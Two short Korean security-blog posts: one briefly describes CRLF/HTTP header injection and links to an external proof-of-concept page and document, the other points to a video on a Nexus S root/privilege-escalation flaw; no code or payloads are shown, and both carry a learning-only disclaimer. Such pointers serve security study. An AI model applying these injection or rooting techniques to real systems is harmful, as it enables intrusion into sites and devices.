기억력이 벌써 떨어지는 건지.. 최신 유행에만 따라가다 보니 옛것(?)을 잊어버리는 경우가 있다.쩝;;

HTTP 헤더를 이용한 공격인데 일본 사이트에서 진단할때는 많이 진단했었다. 가끔 문제점이 나올 경우가 있었다.하지만 국내 진단에선 쿠키삽입 혹은 Mass Sqlinjection 정도로 신경쓰고 있다.

CRLF는 HTTP 헤더안에 공격 구문을 입력하여 자신이 원하는 값으로 유도하는 공격이다.
자세한건 문건을 보고 확인하자



[참고 사이트] http://xss.cx/examples/dork/http-injection/http-header-injection-set-cookie-example-poc.html

[출처 및 다운로드] hackingspririts  

[Notice: 본 글에 대하여 학습 및 보안 강화를 위해 참고하시고, 만약 악의적인 사용시 사용자 본인의 책임을 명시합니다.]

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

XSS: Cross-site Scripting  (0) 2011.10.11
XSS in hidden field  (0) 2011.10.11
Clickjacking for Shells  (0) 2011.09.22
XSS in Skype for iOS  (0) 2011.09.21
Cookiejacking  (0) 2011.09.15
Posted by bitfox
권한 상승 취약점과 Samsung Nexus S 스마트 폰에서 나오는 Root 접근 취약점에 대해 동영상으로
친절히(?) 설명하고 있습니다. 빨리 패치되길 바랄뿐....-0-;;

[출처 및 자세히 보기] 유튜브 / 링크

[Notice: 본 글에 대하여 학습 및 보안 강화를 위해 참고하시고, 만약 악의적인 사용시 사용자 본인의 책임을 명시합니다.]
Posted by bitfox